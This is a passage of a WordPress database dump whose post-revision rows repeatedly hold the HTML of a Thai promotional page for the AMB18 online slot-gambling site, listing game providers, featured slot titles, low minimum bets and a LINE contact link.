sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างของ AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>AMB18 แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-03-02 08:28:29','2026-03-02 08:28:29','',44,'https://amb18slot.com/?p=416',0,'revision','',0);
INSERT INTO `IwGJ28BV_posts` VALUES (417,3,'2026-03-02 08:28:29','2026-03-02 08:28:29','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างของ AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>AMB18 แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-03-02 08:28:29','2026-03-02 08:28:29','',44,'https://amb18slot.com/?p=417',0,'revision','',0),(418,3,'2026-03-02 08:28:29','2026-03-02 08:28:29','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"AMB18\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม </p><p>ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย 